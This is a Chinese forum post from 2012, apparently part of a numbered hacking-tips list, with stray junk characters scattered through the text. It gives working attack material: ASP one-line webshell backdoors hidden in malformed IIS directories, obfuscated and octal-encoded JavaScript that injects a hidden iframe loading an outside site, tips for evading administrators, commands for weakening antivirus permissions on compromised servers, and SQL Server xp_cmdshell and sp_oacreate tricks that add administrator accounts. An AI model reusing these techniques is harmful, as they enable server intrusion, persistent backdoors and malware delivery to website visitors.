用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
; ?7 [2 p% }* Y' ]% F( m+ A6 f; [1 h+ a' p% i
53、隐藏ASP后门的两种方法
8 G- F. m5 S7 B" U0 B1、建立非标准目录:mkdir images..\
! Y# o ?0 o6 X! h# b拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
3 {3 X" P. b1 Y0 U通过web访问ASP木马:http://ip/images../news.asp?action=login
2 W# |+ H- I# b1 M( ^& ? k如何删除非标准目录:rmdir images..\ /s
' t( E: B) x9 N7 b2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
# a5 v' G5 c3 X' y4 g9 B5 U5 C3 ]mkdir programme.asp
5 Y0 R# g x+ M' e6 d" o0 Q, X新建1.txt文件内容:<!--#include file=”12.jpg”-->( L9 g+ h7 J: V$ j/ |# w, O
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
3 @7 S; H6 a4 u7 @attrib +H +S programme.asp
1 r$ \8 @, |7 l7 a通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
/ u7 |1 X: A" g2 T% L8 j& z3 V, N2 Q8 h5 }2 w9 J+ y M" L2 I$ e
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
( u+ `8 E3 ~- A1 R4 {然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
. |( R0 ?2 _7 o! {* A6 f. A% v2 }& ^ I& |( |9 n7 B* e" g
55、JS隐蔽挂马7 c% I" c8 Y$ {3 B
1.( i; R' {3 d. q+ q" k4 p" V
var tr4c3="<iframe src=ht";
% h |0 q. S" E" J) y/ M) D+ |0 f% Atr4c3 = tr4c3+"tp:/";9 W: `$ J! f& H% X5 I' _
tr4c3 = tr4c3+"/ww";
' X5 G) g3 j( c7 ]tr4c3 = tr4c3+"w.tr4";
# @. g' |8 O6 B0 ~. \+ V4 F ~tr4c3 = tr4c3+"c3.com/inc/m";3 V# @! j* Y/ O1 R5 m% x# h/ k; g
tr4c3 = tr4c3+"m.htm style="display:none"></i";
8 C% E; V9 z+ K3 e7 |. P' str4c3 =tr4c3+"frame>'";
) d! V: b( ^# w; Rdocument.write(tr4c3);
, |6 K* C! _) K" L7 n+ ^5 @避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
/ i" P+ i& p' j {& ?+ `- {; z+ |7 V @% D' f. U$ ~9 R5 }. X2 B% O' b
2.$ k8 }1 x. b# Z+ I3 R
转换进制,然后用EVAL执行。如( ]& p1 G0 L3 N2 s
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
d5 F& y, ^) S% p# @$ A不过这个有点显眼。7 p h. l" w" b7 _+ ~$ S `
3.# ]# w. d# ]+ \! x- [9 s
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
& R$ L# s4 Q4 e$ @! x最后一点,别忘了把文件的时间也修改下。( u& j; d$ H* W* R
4 u8 A0 U+ }$ j$ F+ D* c
56.3389终端入侵常用DOS命令
: U* v2 E0 u( xtaskkill taskkill /PID 1248 /t; p/ l% A+ |. Z
- u; i7 z' ^3 Z& P5 Q: i5 e
tasklist 查进程
( M2 \5 C3 i% G3 ]* I6 Z( c
+ U5 O/ c' ^4 l8 @& C4 }* h1 `cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限; b7 [5 W. k, C
iisreset /reboot
" t) Q# l% l/ i5 v/ |/ Ztsshutdn /reboot /delay:1 重起服务器- _: y% k. q2 X$ \4 n
" n' B9 ]& Q1 I: }4 v! A( j3 N
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,6 U3 A) h/ o( g
; B: {% |4 }3 q! aquery user 查看当前终端用户在线情况% I i8 Q2 c, f F! F
9 V- v4 u9 H1 v3 A
要显示有关所有会话使用的进程的信息,请键入:query process *
& `+ \8 `8 u; W, n4 {! k5 d0 v* Z6 ^/ F7 ]$ G* u5 g D
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2) Y& B4 M/ D5 w& A
7 v, l" e8 p2 i% X
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
4 p6 ?7 D X; o. M
& q+ Q) U& S% z# \- v; g要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
2 `1 s {5 d: g3 a& d' o( N- f" i: e6 ? \& {3 X1 `
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
7 k6 _- r- Q) X7 E5 }9 }( U$ U6 S
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统2 j9 ?4 T+ y8 F. p
( u. B6 C7 h$ P- y. S命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
7 b4 Z/ H* S# b' e, O" H( D; ?# u6 T( c& v% n
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机; l4 f4 q9 w5 {" `
l1 e1 W* M/ e6 `56、在地址栏或按Ctrl+O,输入:6 p) G# R$ A5 i5 s, z5 p! n1 B' M
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
& ?! X. g( @, K. q% ?8 y5 K& a1 V5 D6 j
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
, D- }0 H1 f9 R' L( I7 L, X d. _1 s9 G
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
/ g. Q( J- T0 r用net localgroup administrators是可以看到管理组下,加了$的用户的。
" _5 K7 Q. @( _4 Z+ O: C1 I2 t/ ^" Q5 u6 W% R6 p4 `1 R2 w8 M9 T
58、 sa弱口令相关命令
) J0 a" n# `! O$ r- u. N
- D {! c" |5 U$ U0 Y一.更改sa口令方法:
- N1 O4 m3 H2 s; G* v用sql综合利用工具连接后,执行命令:
. t/ a- Q8 c) D- { kexec sp_password NULL,'20001001','sa'
. j! w8 X: w9 p: A9 m(提示:慎用!)9 O% _ p' [: i$ j& A9 \
* u) S( Q7 ~0 Z+ v
二.简单修补sa弱口令.
6 J, [; y. f' P7 b8 T" [% g0 R ~* p, r B
方法1:查询分离器连接后执行:
7 I; ^: y. d: Y0 Qif exists (select * from8 o: ?6 R/ N* C( M
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
* ~# g: G, f- Z8 `- a1 a9 n6 V0 yOBJECTPROPERTY(id, N'IsExtendedProc') = 1)3 w8 r% `0 X0 T: g# h% f, e
, P" }0 S3 ^" `2 H1 u$ y. t7 oexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
3 x6 } y1 q7 @9 R P. S
, ~* U; u2 e+ u* N3 o1 XGO/ X# \$ X2 N3 z \
# m# T8 n! E- J( h+ w( z然后按F5键命令执行完毕
- K1 L- w) H/ x7 f6 Y, _
! h6 ?6 l8 M1 C: g1 E7 K方法2:查询分离器连接后9 y: `* W8 K& ]# I, Q8 w5 w+ Q
第一步执行:use master* }# x6 d5 e: M/ K$ W: Z* {5 w
第二步执行:sp_dropextendedproc 'xp_cmdshell'4 [! [( U7 S* a2 {
然后按F5键命令执行完毕
# d f! ]$ y9 S7 a; G
4 |. ]% z! d9 p1 `3 k9 l2 H# e2 I! Y( N/ o+ A+ {
三.常见情况恢复执行xp_cmdshell.
+ W7 [5 X" Z1 F5 d3 _: d" F) d* E4 }( L$ i$ k3 h9 l; b
6 J$ r8 J5 ?, e/ i0 l5 l
1 未能找到存储过程'master..xpcmdshell'.8 u7 ?/ [$ M$ T2 K5 x4 _3 N+ H
恢复方法:查询分离器连接后,
7 q% k" i/ W6 D2 t5 C6 M- F8 Q第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int2 q: i9 ~$ h1 s* P/ M# R
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'9 y% E1 H: U* l4 `
然后按F5键命令执行完毕
/ q4 E# x; v5 ]& F8 n5 @; R3 g' j# E! ?' u4 m2 l: v8 p* v
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
P* T, |5 W! ~' ?' ] _恢复方法:查询分离器连接后,5 d0 A, |; h% K: N* ?; _: w
第一步执行:sp_dropextendedproc "xp_cmdshell"
& j6 p& J( a: g- N# y+ M% u# k第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
* c+ S- p8 G& H3 X% ?# n0 j然后按F5键命令执行完毕7 U" j' d1 X. E( a
( D+ ~3 T/ ^9 _9 u1 p
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
1 q0 ~+ M! D3 Q恢复方法:查询分离器连接后,. S' C0 `9 x% |8 O# m
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
2 ]' b2 x$ p. H0 O2 X2 e0 b# i第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' B$ T; i C' W( a4 H# \/ x+ S
然后按F5键命令执行完毕) x7 g7 R6 `5 i# o) ^3 ?1 r
5 U8 ~' J$ m! e5 F& L0 g9 K
四.终极方法.+ h- L; j+ }7 e# d1 V; I2 R
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:+ r, Q# ^5 b. K- x7 V4 y
查询分离器连接后,) o: ?" l# o& J$ }
2000servser系统:; N# z0 p2 _5 J% T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'8 |$ z- k8 y( }7 O9 n' [& q
6 q. G, j+ N) t8 T7 M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
2 G8 m0 H+ `# ^4 j* r; ?8 f
* T5 v1 F, \4 c! A rxp或2003server系统: a$ ^; y- g! x% g0 O! Q" p: ?1 m4 Z
3 Q- Q3 T2 E( p6 _
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
3 k, z Z" B: q4 i6 M! a4 u. k" v- F& [ d {& L" Z6 e ?/ ` C
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
7 U! P. q. L8 u* A6 A5 T9 V9 p |
发表于 2012-9-15 14:13:15
收藏
支持
反对